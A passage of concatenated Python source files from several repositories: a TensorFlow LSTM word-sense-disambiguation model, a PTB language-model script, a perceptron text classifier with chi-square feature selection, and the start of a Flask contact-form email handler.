emb = emb + std_embeddings * tf.random_normal([batch_size, embedding_size],
stddev=emb_base_std) # tf.nn.dropout(emb, emb_keep_prop)
_, b_state = b_lstm(emb, b_state)
f_state = tf.slice(tf.split(1, n_layers, f_state)[-1], [0, n_units], [batch_size, n_units])
b_state = tf.slice(tf.split(1, n_layers, b_state)[-1], [0, n_units], [batch_size, n_units])
state = tf.concat(1, [f_state, b_state])
if is_training:
state = tf.nn.dropout(state, keep_prob)
# hidden layer
with tf.variable_scope('hidden', initializer=tf.random_uniform_initializer(-0.1, 0.1)):
hidden = rnn_cell.linear(state, state_size, True)
if is_training:
hidden = tf.nn.dropout(hidden, keep_prob)
# y_hidden = tf.nn.tanh(hidden)
loss = tf.Variable(0., trainable=False)
n_correct = tf.Variable(0, trainable=False)
unbatched_states = tf.split(0, batch_size, hidden)
unbatched_target_ids = tf.split(0, batch_size, train_target_ids)
unbatched_sense_ids = tf.split(0, batch_size, train_sense_ids)
one = tf.constant(1, tf.int32, [1])
self.predictions = tf.Variable(tf.zeros([batch_size], dtype=tf.int64), trainable=False)
self.probas={}
# make predictions for all instances in batch
for i in range(batch_size):
target_id = unbatched_target_ids[i] # tf.split(train_target_ids, i, [1])
sense_id = unbatched_sense_ids[i]
self.dbg['W'] = W = tf.reshape(
tf.slice(W_target, tf.slice(W_starts, target_id, one), tf.slice(W_lengths, target_id, one)),
[-1, state_size])
self.dbg['b'] = b = tf.slice(b_target, tf.slice(b_starts, target_id, one),
tf.slice(b_lengths, target_id, one))
# self.dbg['ub_states'] = unbatched_states[i]
# self.dbg['ub_states.shape'] = tf.shape(unbatched_states[i])
# self.dbg['pre_b'] = tf.squeeze(tf.matmul(W, unbatched_states[i], False, True))
self.dbg['logits'] = logits = tf.squeeze(tf.matmul(W, unbatched_states[i], False, True)) + b
predicted_sense = tf.arg_max(logits, 0, name='prediction')
self.predictions = tf.scatter_update(self.predictions, tf.constant(i, dtype=tf.int64), predicted_sense)
self.dbg['exp_logits'] = exp_logits = tf.exp(logits)
summ = tf.reduce_sum(exp_logits)
self.dbg['p_targets'] = p_targets = exp_logits / summ
n_senses = tf.slice(n_senses_sorted_by_target_id_tf, target_id, [1])
answer = tf.sparse_to_dense(sense_id, n_senses, 1.0, 0.0)
p_target = tf.slice(p_targets, sense_id, one)
# p_target_safe = max(0.0001, p_target)
self.dbg['p_targets_safe'] = p_targets_safe = max(0.0001, p_targets)
self.probas[i]=p_targets_safe
self.dbg['mul'] = mul = tf.mul(answer, tf.log(p_targets_safe))
loss += - tf.reduce_sum(mul)
# loss += - tf.log(p_target_safe)
# accuracy
n_correct += tf.cast(tf.equal(sense_id, tf.cast(tf.arg_max(logits, 0), tf.int32)), tf.int32)
# if i == batch_size-1:
# tf.scalar_summary(['p_target'], p_target)
# tf.scalar_summary(['n_correct'], tf.cast(n_correct, tf.float32))
# tf.histogram_summary('logits', logits)
# tf.histogram_summary('W_target', W_target)
# tf.histogram_summary('b_target', b_target)
self.dbg['predictions'] = self.predictions
self.cost_op = tf.div(loss, batch_size)
self.accuracy_op = tf.div(tf.cast(n_correct, tf.float32), batch_size)
self.error_op = self.cost_op
if not is_training:
return
# grads = tf.gradients(self.cost_op, W_target)
# tf.histogram_summary('grad_W_target', grads[0])
# tf.scalar_summary('frac_0_grad_W', tf.nn.zero_fraction(grads[0]))
print 'TRAINABLE VARIABLES'
tvars = tf.trainable_variables()
for tvar in tvars:
print tvar.name
# Weight Penalty
if w_penalty:
print 'USING WEIGHT DECAY'
tensors_to_decay = ['model/target_params/W_target:0',
'model/forward/MultiRNNCell/Cell0/BasicLSTMCell/Linear/Matrix:0',
'model/backward/MultiRNNCell/Cell0/BasicLSTMCell/Linear/Matrix:0',
'model/hidden/Linear/Matrix:0']
w_cost = tf.constant(0.0)
n_w = tf.constant(0.0)
for tvar in tvars:
if tvar.name in tensors_to_decay:
w_cost += tf.nn.l2_loss(tvar)
n_w += tf.to_float(tf.size(tvar))
self.cost_op += w_penalty * w_cost / n_w
# Gradients
max_grad_norm = 10
grads, _ = tf.clip_by_global_norm(tf.gradients(self.cost_op, tvars), max_grad_norm)
self.lr = tf.maximum(lr_min, tf.train.exponential_decay(lr_start, global_step, 200, lr_decay_factor))
optimizer = tf.train.MomentumOptimizer(self.lr, 0.5)
# scaling down the learning for the embedings in the beginning
# w = tf.constant(should_update, shape=[vocab_size, embedding_size])
# w_embedding = tf.select(w, tf.zeros([vocab_size, embedding_size]), tf.ones([vocab_size, embedding_size]))
# if conf['train_embeddings']:
# self.dbg['should_update'] = should_update = tf.to_float(tf.less(tf.to_int32(global_step), skip_train_emb))
# for i, tvar in enumerate(tvars):
# if tvar.name == 'model/emb/embeddings:0':
# grads[i] = tf.mul(grads[i], should_update)
# self.dbg['grad_embeddings'] = tf.convert_to_tensor(grads[i])
# Update Parameters
self.train_op = optimizer.apply_gradients(zip(grads, tvars), global_step=global_step)
self.train_op_no_emb = optimizer.apply_gradients(zip(grads[1:], tvars[1:]), global_step=global_step)
# Summaries
self.summary_op = tf.merge_all_summaries()
def debug(model, session, feed_dict):
for name, op in model.dbg.iteritems():
value = session.run(op, feed_dict)
print '::: %s :::: \n%s' % (name, np.array_str(value))
def debug_op(op, session, feed_dict):
value = session.run(op, feed_dict)
print value
def run_epoch(session, model, conf, data_, mode, word_to_id, freeze_emb=False):
if mode == 'train':
ops = [model.cost_op, model.accuracy_op, model.lr]
if freeze_emb:
print 'Embeddings frozen'
ops += [model.train_op_no_emb]
else:
ops += [model.train_op]
elif mode == 'val':
ops = [model.cost_op, model.accuracy_op]
else:
raise ValueError('unknown mode')
cost = 0.
accuracy = 0.
lr = 0.0
summaries = []
n_batches = 0
for batch in batch_generator(mode == 'train', conf['batch_size'], data_, word_to_id['<pad>'], conf['n_step_f'],
conf['n_step_b'], permute_order=conf.get('permute_input_order'),
word_drop_rate=conf.get('word_drop_rate'), drop_id=word_to_id['<dropped>']):
xf, xb, target_ids, sense_ids, instance_ids = batch
feeds = {
model.inputs_f: xf,
model.inputs_b: xb,
model.train_target_ids: target_ids,
model.train_sense_ids: sense_ids
}
# debug(model, session, feeds)
# debug_op(model.dbg['grad_embeddings'], session, feeds)
fetches = session.run(ops, feeds)
cost += fetches[0]
accuracy += fetches[1]
if mode == 'train':
lr += fetches[2]
n_batches += 1
cost_epoch = cost / n_batches
accuracy_epoch = accuracy / n_batches
lr /= n_batches
print '%s --> \tcost: %f, \taccuracy: %f, n_batches: %f \tlr: %f' % (mode.upper(), cost_epoch, accuracy_epoch, n_batches, lr)
# if mode == 'train':
# return summaries
return cost_epoch, accuracy_epoch
```
#### File: jia1/lstm_wsd/scratch.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import sys
import time
import tensorflow.python.platform
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
# NOTE: assumes the TF 0.x module layout used elsewhere in this repo (see
# model2.py); rnn_cell and seq2seq lived under tensorflow.models.rnn there.
from tensorflow.models.rnn import rnn_cell, seq2seq
from tensorflow.python.platform import gfile
def _read_words(filename):
with gfile.GFile(filename, "r") as f:
return f.read().replace("\n", "<eos>").split()
def _build_vocab(filename):
data = _read_words(filename)
counter = collections.Counter(data)
count_pairs = sorted(counter.items(), key=lambda x: -x[1])
words, _ = list(zip(*count_pairs))
word_to_id = dict(zip(words, range(len(words))))
return word_to_id
def _file_to_word_ids(filename, word_to_id):
data = _read_words(filename)
return [word_to_id[word] for word in data]
def ptb_raw_data(data_path=None):
"""Load PTB raw data from data directory "data_path".
Reads PTB text files, converts strings to integer ids,
and performs mini-batching of the inputs.
The PTB dataset comes from <NAME>'s webpage:
http://www.fit.vutbr.cz/~imikolov/rnnlm/simple-examples.tgz
Args:
data_path: string path to the directory where simple-examples.tgz has
been extracted.
Returns:
tuple (train_data, valid_data, test_data, vocabulary)
where each of the data objects can be passed to PTBIterator.
"""
train_path = os.path.join(data_path, "ptb.train.txt")
valid_path = os.path.join(data_path, "ptb.valid.txt")
test_path = os.path.join(data_path, "ptb.test.txt")
word_to_id = _build_vocab(train_path)
train_data = _file_to_word_ids(train_path, word_to_id)
valid_data = _file_to_word_ids(valid_path, word_to_id)
test_data = _file_to_word_ids(test_path, word_to_id)
vocabulary = len(word_to_id)
return train_data, valid_data, test_data, vocabulary
def ptb_iterator(raw_data, batch_size, num_steps):
"""Iterate on the raw PTB data.
This generates batch_size pointers into the raw PTB data, and allows
minibatch iteration along these pointers.
Args:
raw_data: one of the raw data outputs from ptb_raw_data.
batch_size: int, the batch size.
num_steps: int, the number of unrolls.
Yields:
Pairs of the batched data, each a matrix of shape [batch_size, num_steps].
The second element of the tuple is the same data time-shifted to the
right by one.
Raises:
ValueError: if batch_size or num_steps are too high.
"""
raw_data = np.array(raw_data, dtype=np.int32)
data_len = len(raw_data)
batch_len = data_len // batch_size
data = np.zeros([batch_size, batch_len], dtype=np.int32)
for i in range(batch_size):
data[i] = raw_data[batch_len * i:batch_len * (i + 1)]
epoch_size = (batch_len - 1) // num_steps
if epoch_size == 0:
raise ValueError("epoch_size == 0, decrease batch_size or num_steps")
for i in range(epoch_size):
x = data[:, i*num_steps:(i+1)*num_steps]
y = data[:, i*num_steps+1:(i+1)*num_steps+1]
yield (x, y)
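# Editor's sketch (illustrative only, not in the original file): with toy data
# raw_data = range(100), batch_size=5 and num_steps=4, batch_len is 20 and
# epoch_size is (20 - 1) // 4 = 4, so the generator yields four (x, y) pairs,
# each of shape (5, 4), with y shifted one step ahead of x:
#   for x, y in ptb_iterator(list(range(100)), 5, 4):
#       assert x.shape == (5, 4) and y.shape == (5, 4)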
flags = tf.flags
logging = tf.logging
flags.DEFINE_string(
"model", "small",
"A type of model. Possible options are: small, medium, large.")
flags.DEFINE_string("data_path", None, "data_path")
FLAGS = flags.FLAGS
class PTBModel(object):
"""The PTB model."""
def __init__(self, is_training, config):
self.batch_size = batch_size = config.batch_size
self.num_steps = num_steps = config.num_steps
size = config.hidden_size
vocab_size = config.vocab_size
self._input_data = tf.placeholder(tf.int32, [batch_size, num_steps])
self._targets = tf.placeholder(tf.int32, [batch_size, num_steps])
# Slightly better results can be obtained with forget gate biases
# initialized to 1 but the hyperparameters of the model would need to be
# different than reported in the paper.
lstm_cell = rnn_cell.BasicLSTMCell(size, forget_bias=0.0)
if is_training and config.keep_prob < 1:
lstm_cell = rnn_cell.DropoutWrapper(
lstm_cell, output_keep_prob=config.keep_prob)
cell = rnn_cell.MultiRNNCell([lstm_cell] * config.num_layers)
self._initial_state = cell.zero_state(batch_size, tf.float32)
with tf.device("/cpu:0"):
embedding = tf.get_variable("embedding", [vocab_size, size])
inputs = tf.split(
1, num_steps, tf.nn.embedding_lookup(embedding, self._input_data))
inputs = [tf.squeeze(input_, [1]) for input_ in inputs]
if is_training and config.keep_prob < 1:
inputs = [tf.nn.dropout(input_, config.keep_prob) for input_ in inputs]
# Simplified version of tensorflow.models.rnn.rnn.py's rnn().
# This builds an unrolled LSTM for tutorial purposes only.
# In general, use the rnn() or state_saving_rnn() from rnn.py.
#
# The alternative version of the code below is:
#
# from tensorflow.models.rnn import rnn
# outputs, states = rnn.rnn(cell, inputs, initial_state=self._initial_state)
outputs = []
states = []
state = self._initial_state
with tf.variable_scope("RNN"):
for time_step, input_ in enumerate(inputs):
if time_step > 0: tf.get_variable_scope().reuse_variables()
(cell_output, state) = cell(input_, state)
outputs.append(cell_output)
states.append(state)
output = tf.reshape(tf.concat(1, outputs), [-1, size])
logits = tf.nn.xw_plus_b(output,
tf.get_variable("softmax_w", [size, vocab_size]),
tf.get_variable("softmax_b", [vocab_size]))
loss = seq2seq.sequence_loss_by_example([logits],
[tf.reshape(self._targets, [-1])],
[tf.ones([batch_size * num_steps])],
vocab_size)
self._cost = cost = tf.reduce_sum(loss) / batch_size
self._final_state = states[-1]
if not is_training:
return
self._lr = tf.Variable(0.0, trainable=False)
tvars = tf.trainable_variables()
grads, _ = tf.clip_by_global_norm(tf.gradients(cost, tvars),
config.max_grad_norm)
optimizer = tf.train.GradientDescentOptimizer(self.lr)
self._train_op = optimizer.apply_gradients(zip(grads, tvars))
def assign_lr(self, session, lr_value):
session.run(tf.assign(self.lr, lr_value))
@property
def input_data(self):
return self._input_data
@property
def targets(self):
return self._targets
@property
def initial_state(self):
return self._initial_state
@property
def cost(self):
return self._cost
@property
def final_state(self):
return self._final_state
@property
def lr(self):
return self._lr
@property
def train_op(self):
return self._train_op
class SmallConfig(object):
"""Small config."""
init_scale = 0.1
learning_rate = 1.0
max_grad_norm = 5
num_layers = 2
num_steps = 20
hidden_size = 200
max_epoch = 4
max_max_epoch = 13
keep_prob = 1.0
lr_decay = 0.5
batch_size = 20
vocab_size = 10000
class MediumConfig(object):
"""Medium config."""
init_scale = 0.05
learning_rate = 1.0
max_grad_norm = 5
num_layers = 2
num_steps = 35
hidden_size = 650
max_epoch = 6
max_max_epoch = 39
keep_prob = 0.5
lr_decay = 0.8
batch_size = 20
vocab_size = 10000
class LargeConfig(object):
"""Large config."""
init_scale = 0.04
learning_rate = 1.0
max_grad_norm = 10
num_layers = 2
num_steps = 35
hidden_size = 1500
max_epoch = 14
max_max_epoch = 55
keep_prob = 0.35
lr_decay = 1 / 1.15
batch_size = 20
vocab_size = 10000
def run_epoch(session, m, data, eval_op, verbose=False):
"""Runs the model on the given data."""
epoch_size = ((len(data) // m.batch_size) - 1) // m.num_steps
start_time = time.time()
costs = 0.0
iters = 0
state = m.initial_state.eval()
  for step, (x, y) in enumerate(ptb_iterator(data, m.batch_size, m.num_steps)):
cost, state, _ = session.run([m.cost, m.final_state, eval_op],
{m.input_data: x,
m.targets: y,
m.initial_state: state})
costs += cost
iters += m.num_steps
if verbose and step % (epoch_size // 10) == 10:
print("%.3f perplexity: %.3f speed: %.0f wps" %
(step * 1.0 / epoch_size, np.exp(costs / iters),
iters * m.batch_size / (time.time() - start_time)))
return np.exp(costs / iters)
def get_config():
if FLAGS.model == "small":
return SmallConfig()
elif FLAGS.model == "medium":
return MediumConfig()
elif FLAGS.model == "large":
return LargeConfig()
else:
raise ValueError("Invalid model: %s", FLAGS.model)
def main(unused_args):
if not FLAGS.data_path:
raise ValueError("Must set --data_path to PTB data directory")
  raw_data = ptb_raw_data(FLAGS.data_path)
train_data, valid_data, test_data, _ = raw_data
config = get_config()
eval_config = get_config()
eval_config.batch_size = 1
eval_config.num_steps = 1
with tf.Graph().as_default(), tf.Session() as session:
initializer = tf.random_uniform_initializer(-config.init_scale,
config.init_scale)
with tf.variable_scope("model", reuse=None, initializer=initializer):
m = PTBModel(is_training=True, config=config)
with tf.variable_scope("model", reuse=True, initializer=initializer):
mvalid = PTBModel(is_training=False, config=config)
mtest = PTBModel(is_training=False, config=eval_config)
tf.initialize_all_variables().run()
for i in range(config.max_max_epoch):
lr_decay = config.lr_decay ** max(i - config.max_epoch, 0.0)
m.assign_lr(session, config.learning_rate * lr_decay)
print("Epoch: %d Learning rate: %.3f" % (i + 1, session.run(m.lr)))
train_perplexity = run_epoch(session, m, train_data, m.train_op,
verbose=True)
print("Epoch: %d Train Perplexity: %.3f" % (i + 1, train_perplexity))
valid_perplexity = run_epoch(session, mvalid, valid_data, tf.no_op())
print("Epoch: %d Valid Perplexity: %.3f" % (i + 1, valid_perplexity))
test_perplexity = run_epoch(session, mtest, test_data, tf.no_op())
print("Test Perplexity: %.3f" % test_perplexity)
if __name__ == "__main__":
tf.app.run()
``` |
{
"source": "jia1/pyceptron",
"score": 3
} |
#### File: jia1/pyceptron/tc_train.py
```python
import math
import os
import re
import sys
from string import punctuation
from porter import PorterStemmer
from random import seed, randrange
args = sys.argv
if len(args) != 4:
sys.exit('Usage: python3 tc_train.py stopword-list train-class-list model')
print('Command line arguments accepted.')
stopword_list_file, train_class_list_file, model_file = args[1:]
k = 3
max_compromise = 0
num_both, num_train = 0, 0
train_ratio = 1
# train_ratio = 0.8
# test_ratio = 1 - train_ratio
num_folds_list = [10] # [5, 10]
alpha_list = [0.05] # [0.05, 0.1]
max_iterations_list = [500] # [500, 1000]
num_class = 0
class_list = []
class_to_text = {}
feat_prune_ratio = 0.7
text_to_count = {}
nxx_list = ['n10', 'n11']
nxx_map = {
'n00': 'n10',
'n01': 'n11'
}
nxx_to_word_to_class_to_chi = { n: {} for n in nxx_list }
class_to_word_to_chi = {}
class_to_feat_chi_tup = {}
text_to_word_list = {}
class_to_vocab_to_tfidf = {}
class_to_feat_tfidf_tup = {}
class_to_feat_set = {}
class_to_feat_list_sort_by_lex = {}
class_to_feat_to_index = {}
class_to_feat_mat = {}
class_to_weights = {}
p = PorterStemmer()
seed(4248)
print('Data structures loaded.')
def strip_and_filter_line(ln):
if all(x in ln for x in [':', '@']):
return []
tokens = map(lambda t: t.strip().strip(punctuation).lower(), ln.split(' '))
return list(filter(lambda t: t and len(t) > 2 and t.isalpha() and t not in stop_list, tokens))
def get_word_to_count(word_list):
word_to_count = {}
num_words = len(word_list)
prev_unigram = word_list[0]
for i in range(1, num_words):
curr_unigram = word_list[i]
ngrams = [curr_unigram, '{} {}'.format(prev_unigram, curr_unigram)]
for ngram in ngrams:
if ngram not in word_to_count:
word_to_count[ngram] = 1
else:
word_to_count[ngram] += 1
prev_unigram = curr_unigram
return word_to_count
def get_weaker_word_to_count(word_to_count):
fin_word_to_count = {}
for compromise in range(1, max_compromise + 1):
if fin_word_to_count:
break
fin_word_to_count = { word: count for word, count in word_to_count.items() \
if count >= k - compromise }
for len_gram in range(2, 0, -1):
fin_word_to_count = { word: count for word, count in fin_word_to_count.items() \
if len(word.split(' ')) >= len_gram }
if fin_word_to_count:
break
return fin_word_to_count
def is_in(a, b):
return 1 if a in b else 0
def count_nxx(nxx, w, c):
nxx_value = 0
if nxx == 'n10':
for class_name in filter(lambda x: x != c, class_list):
for text in class_to_text[class_name]:
nxx_value += is_in(w, text_to_count[text])
elif nxx == 'n11':
for text in class_to_text[c]:
nxx_value += is_in(w, text_to_count[text])
return nxx_value
def calc_chi_square(w, c):
nxx_to_count = {}
for n in nxx_list:
if w not in nxx_to_word_to_class_to_chi[n]:
nxx_to_word_to_class_to_chi[n][w] = {}
if c not in nxx_to_word_to_class_to_chi[n][w]:
nxx_to_word_to_class_to_chi[n][w][c] = count_nxx(n, w, c)
nxx_to_count[n] = nxx_to_word_to_class_to_chi[n][w][c]
for n, nn in nxx_map.items():
nxx_to_count[n] = num_train - nxx_to_word_to_class_to_chi[nn][w][c]
n00, n01, n10, n11 = nxx_to_count['n00'], nxx_to_count['n01'], nxx_to_count['n10'], nxx_to_count['n11']
return ((n11+n10+n01+n00)*(n11*n00-n10*n01)**2)/((n11+n01)*(n11+n10)*(n10+n00)*(n01+n00))
def put_chi(c, w, chi_value):
global class_to_word_to_chi
if w not in class_to_word_to_chi[c]:
class_to_word_to_chi[c][w] = chi_value
else:
class_to_word_to_chi[c][w] = max(class_to_word_to_chi[c][w], chi_value)
def gen_feat_by_chi():
global class_to_feat_chi_tup
max_feat_vec_len = sys.maxsize
class_to_feat_sorted = { c: [] for c in class_list }
for c in class_to_word_to_chi:
class_to_feat_sorted[c] = sorted(class_to_word_to_chi[c].items(), key = lambda x: x[1], reverse = True)
max_feat_vec_len = min(max_feat_vec_len, len(class_to_feat_sorted[c]))
max_feat_vec_len *= feat_prune_ratio
class_to_feat_chi_tup = { c: class_to_feat_sorted[c][:int(max_feat_vec_len)] for c in class_to_feat_sorted }
def gen_feat_by_tfidf():
global class_to_vocab_to_tfidf
for c in class_list:
for text in class_to_text[c]:
word_list = text_to_word_list[text]
prev_unigram = word_list[0]
class_to_vocab_to_tfidf[c][prev_unigram] = 0
for i in range(1, len(word_list)):
curr_unigram = word_list[i]
bigram = '{} {}'.format(prev_unigram, curr_unigram)
class_to_vocab_to_tfidf[c][curr_unigram] = 0
class_to_vocab_to_tfidf[c][bigram] = 0
prev_unigram = curr_unigram
for c in class_list:
for text in class_to_text[c]:
word_list = text_to_word_list[text]
prev_unigram = word_list[0]
class_to_vocab_to_tfidf[c][prev_unigram] = 0
for i in range(1, len(word_list)):
curr_unigram = word_list[i]
bigram = '{} {}'.format(prev_unigram, curr_unigram)
class_to_vocab_to_tfidf[c][curr_unigram] += 1
class_to_vocab_to_tfidf[c][bigram] += 1
prev_unigram = curr_unigram
for c in class_list:
num_texts = len(class_to_text[c])
for v in class_to_vocab_to_tfidf[c]:
class_to_vocab_to_tfidf[c][v] = math.log(num_texts / (1 + class_to_vocab_to_tfidf[c][v]))
max_feat_vec_len = sys.maxsize
class_to_feat_sorted = { c: [] for c in class_list }
for c in class_to_word_to_chi:
class_to_feat_sorted[c] = sorted(class_to_vocab_to_tfidf[c].items(), key = lambda x: x[1], reverse = True)
max_feat_vec_len = min(max_feat_vec_len, len(class_to_feat_sorted[c]))
max_feat_vec_len *= feat_prune_ratio
class_to_vocab_to_tfidf = { c: class_to_feat_sorted[c][:int(max_feat_vec_len)] for c in class_to_feat_sorted }
def feat_select():
# gen_feat_by_tfidf()
for c in class_list:
for text in class_to_text[c]:
for w in text_to_count[text]:
put_chi(c, w, calc_chi_square(w, c))
gen_feat_by_chi()
print('Helper functions defined.')
with open(stopword_list_file, 'r') as s:
stop_list = list(map(lambda ln: ln.strip(), s.readlines()))
print('Stop words loaded into memory.')
with open(train_class_list_file, 'r') as t:
lines = map(lambda ln: ln.strip().split(' '), t.readlines())
for ln in lines:
file, curr_class = ln
text = file.split('/')[-1]
num_both += 1
num_train += 1
flat_text = []
with open(file, 'r') as f:
for line in map(lambda ln: strip_and_filter_line(ln), f.readlines()):
flat_text.extend(list(map(lambda word: p.stem(word, 0, len(word) - 1), line)))
word_to_count = get_word_to_count(flat_text)
fin_word_to_count = { word: count for word, count in word_to_count.items() if count >= k }
if not fin_word_to_count:
fin_word_to_count = get_weaker_word_to_count(word_to_count)
sum_count = sum(fin_word_to_count.values())
if curr_class not in class_list:
class_list.append(curr_class)
num_class += 1
class_to_text[curr_class] = set()
class_to_word_to_chi[curr_class] = {}
class_to_feat_chi_tup[curr_class] = set()
class_to_vocab_to_tfidf[curr_class] = {}
# class_to_word_to_num_text[curr_class] = {}
class_to_feat_tfidf_tup[curr_class] = set()
class_to_feat_set[curr_class] = set()
class_to_feat_list_sort_by_lex[curr_class] = []
class_to_feat_to_index[curr_class] = {}
class_to_weights[curr_class] = []
class_to_text[curr_class].add(text)
text_to_word_list[text] = flat_text
text_to_count[text] = { word: count / sum_count for word, count in fin_word_to_count.items() }
print('Frequency of unigrams and bigrams counted.')
class_to_word_to_chi = { c: {} for c in class_list }
class_to_feat_chi_tup = { c: set() for c in class_list }
class_to_word_to_num_text = { c: {} for c in class_list }
class_to_feat_tfidf_tup = { c: set() for c in class_list }
print('Feature selection beginning...')
feat_select()
print('Feature selection completed.')
class_to_feat_set = { c: set() for c in class_list }
for c in class_to_feat_chi_tup:
for p in class_to_feat_chi_tup[c]:
w = p[0]
class_to_feat_set[c].add(w)
curr_num_feat = len(class_to_feat_set[c])
num_feat_per_neg_class = curr_num_feat // (num_class - 1)
for nc in class_to_feat_chi_tup:
if nc != c:
num_added = 0
            for t in class_to_feat_chi_tup[nc]:
                class_to_feat_set[c].add(t[0])
                num_added += 1
if num_added >= num_feat_per_neg_class:
break
print('Features from negative classes added to each positive class.')
class_to_feat_list_sort_by_lex = { c: sorted(list(class_to_feat_set[c])) for c in class_list }
class_to_feat_to_index = { c: {} for c in class_list }
for c in class_to_feat_list_sort_by_lex:
for i in range(len(class_to_feat_list_sort_by_lex[c])):
class_to_feat_to_index[c][class_to_feat_list_sort_by_lex[c][i]] = i
print('Features mapped to vector indices.')
# https://machinelearningmastery.com/implement-perceptron-algorithm-scratch-python/
# Split data_mat into num_folds number of folds
def get_folds(data_mat, num_folds):
folds = []
data_clone = list(data_mat)
fold_size = int(len(data_mat) / num_folds)
for i in range(num_folds):
fold = []
while len(fold) < fold_size:
index = randrange(len(data_clone))
fold.append(data_clone.pop(index))
folds.append(fold)
return folds
# Calculate accuracy percentage
def get_accuracy(predicted, actual):
num_correct = 0
for i in range(len(actual)):
if predicted[i] == actual[i]:
num_correct += 1
return num_correct / len(actual) * 100
# Evaluate an algorithm using a cross validation split
def get_cross_validation_scores(data_mat, algorithm, num_folds, *args):
folds = get_folds(data_mat, num_folds)
scores = []
for fold in folds:
train_set = list(folds)
train_set.remove(fold)
train_set = [row for fold in train_set for row in fold]
test_set = []
for row in fold:
row_clone = list(row)
test_set.append(row_clone)
row_clone[-1] = None
predicted = algorithm(train_set, test_set, *args)
actual = [row[-1] for row in fold]
accuracy = get_accuracy(predicted, actual)
scores.append(accuracy)
return scores
# Make a prediction with weights
def predict(row, weights):
activation = weights[0]
for i in range(len(row) - 1):
activation += weights[i + 1] * row[i]
return 1 if activation >= 0 else 0
# Estimate Perceptron weights using stochastic gradient descent
def train_weights(train, alpha, max_iterations = 1000):
weights = [0 for i in range(len(train[0]))]
for _ in range(max_iterations):
for row in train:
prediction = predict(row, weights)
error = row[-1] - prediction
if error:
weights[0] = weights[0] + alpha * error
for i in range(len(row) - 1):
weights[i + 1] += alpha * error * row[i]
return weights
# Perceptron Algorithm With Stochastic Gradient Descent
def perceptron(train, test, alpha, max_iterations):
predictions = list()
weights = train_weights(train, alpha, max_iterations)
for row in test:
prediction = predict(row, weights)
predictions.append(prediction)
return predictions
print('Perceptron helper functions defined.')
# Load and prepare data
class_to_feat_mat = { c: [] for c in class_list }
for c in class_list:
for d in class_list:
texts = class_to_text[d]
num_texts = len(texts)
texts = iter(texts)
if c != d:
num_texts_to_train = int(num_texts * train_ratio / (num_class - 1))
else:
num_texts_to_train = num_texts
for i in range(num_texts_to_train):
text = next(texts)
            feat_vec = [0 for i in range(len(class_to_feat_to_index[c]) + 1)]
            for word in text_to_count[text]:
                if word in class_to_feat_to_index[c]:
                    index = class_to_feat_to_index[c][word]
                    feat_vec[index] = text_to_count[text][word]
feat_vec[-1] = 1 if c == d else 0
class_to_feat_mat[c].append(feat_vec)
print('Training data converted to vectors.')
data = class_to_feat_mat
print('Cross validation beginning...')
for num_folds in num_folds_list:
for alpha in alpha_list:
for max_iterations in max_iterations_list:
print('{}-fold cross validation'.format(num_folds))
print('Learning rate: {}, maximum number of iterations: {}'.format(alpha, max_iterations))
for c in class_list:
scores = get_cross_validation_scores(data[c], perceptron, num_folds, alpha, max_iterations)
print('Class: {}'.format(c))
print('Cross validation scores: {}'.format(scores))
print('Mean accuracy: {:.2f}%'.format(sum(scores) / num_folds))
print()
print('Cross validation completed.')
print('Full training beginning...')
print('Training beginning...')
for c in class_list:
class_to_weights[c] = train_weights(data[c], alpha_list[0], max_iterations_list[0])
print('Weights being written to model file...')
with open(model_file, 'w') as m:
lines_to_write = []
lines_to_write.append(str(class_list))
lines_to_write.append(str(class_to_feat_to_index))
lines_to_write.append(str(class_to_weights))
m.write('\n'.join(lines_to_write))
print('Done.')
# Write model to file
# 1. Class list
# 2. Class to feature to index on feature vector
# 3. Class to weights
``` |
{
"source": "jia1/redesigned-eureka",
"score": 3
} |
#### File: jia1/redesigned-eureka/soccat.py
```python
from flask_mail import Mail, Message
import configparser, jinja2, re
# ENQUIRY TYPES
# Connect
# 0 General enquiry
# 1 General feedback
# Partnership
# 2 Collaboration and partnership
# 3 Marketing and sponsorship
# 4 Student-alumni relations
# Outreach
# 5 Event publicity
# 6 Recruitment notice
# Help
# 7 Academic advisory
# 8 Locker enquiry
# 9 IT support
enquiries = {
'0': 'General enquiry',
'1': 'General feedback',
'2': 'Collaboration and partnership',
'3': 'Marketing and sponsorship',
'4': 'Student-alumni relations',
'5': 'Event publicity',
'6': 'Recruitment notice',
'7': 'Academic advisory',
'8': 'Locker enquiry',
'9': 'IT support'
}
recipients = {
'0': ['<EMAIL>'],
'1': ['<EMAIL>'],
'2': ['<EMAIL>'],
'3': ['<EMAIL>'],
'4': ['<EMAIL>'],
'5': ['<EMAIL>'],
'6': ['<EMAIL>'],
'7': ['<EMAIL>'],
'8': ['<EMAIL>'],
'9': ['<EMAIL>', '<EMAIL>']
}
required_fields = ['enquiry', 'name', 'email', 'subject', 'message']
optional_fields = ['phone']
email_regex = re.compile(r"[^@]+@[^@]+")
validators = {
'enquiry': lambda x: x and len(x) == 1 and x.isdigit(),
'name': lambda x: x and 2 <= len(x) <= 30,
'email': lambda x: x and 6 <= len(x) <= 30 and email_regex.match(x),
'phone': lambda x: not x or 8 <= len(x) <= 16 and x.isdigit(),
'subject': lambda x: x and 10 <= len(x) <= 50,
'message': lambda x: x and 10 <= len(x) <= 500
}
def emeow(app, data):
insider = configparser.ConfigParser()
insider.read('himitsu.ini')
app.config['MAIL_SERVER'] = insider['emeow'].get('server')
app.config['MAIL_PORT'] = insider['emeow'].getint('port')
app.config['MAIL_USERNAME'] = insider['emeow'].get('sender')
app.config['MAIL_PASSWORD'] = insider['emeow'].get('password')
app.config['MAIL_USE_SSL'] = insider['emeow'].getboolean('ssl')
app.config['MAIL_USE_TLS'] = insider['emeow'].getboolean('tls')
mailer = Mail(app)
validated = is_valid(data)
    if validated[0]:
enquiry_id = data['enquiry']
# flask_mail.Message(
# subject, recipients, body, html, sender, cc, bcc, reply_to,
# date, charset, extra_headers, mail_options, rcpt_options
# )
mail = Message(
subject = "Connect: %s" % data['subject'],
recipients = recipients[enquiry_id],
sender = insider['emeow'].get('sender')
)
template = jinja2.Environment(
trim_blocks = True,
lstrip_blocks = True,
autoescape = True,
loader = jinja2.FileSystemLoader('templates')
).get_template('meow.html.j2')
data['enquiry'] = enquiries[enquiry_id]
mail.html = template.render(data)
mailer.send(mail)
return 'emeow: OK'
else:
return 'is_valid returns %s: %s' % validated
def is_valid(data):
if data is None or type(data) is not dict:
return (False, "Data is either None or not a dict.")
else:
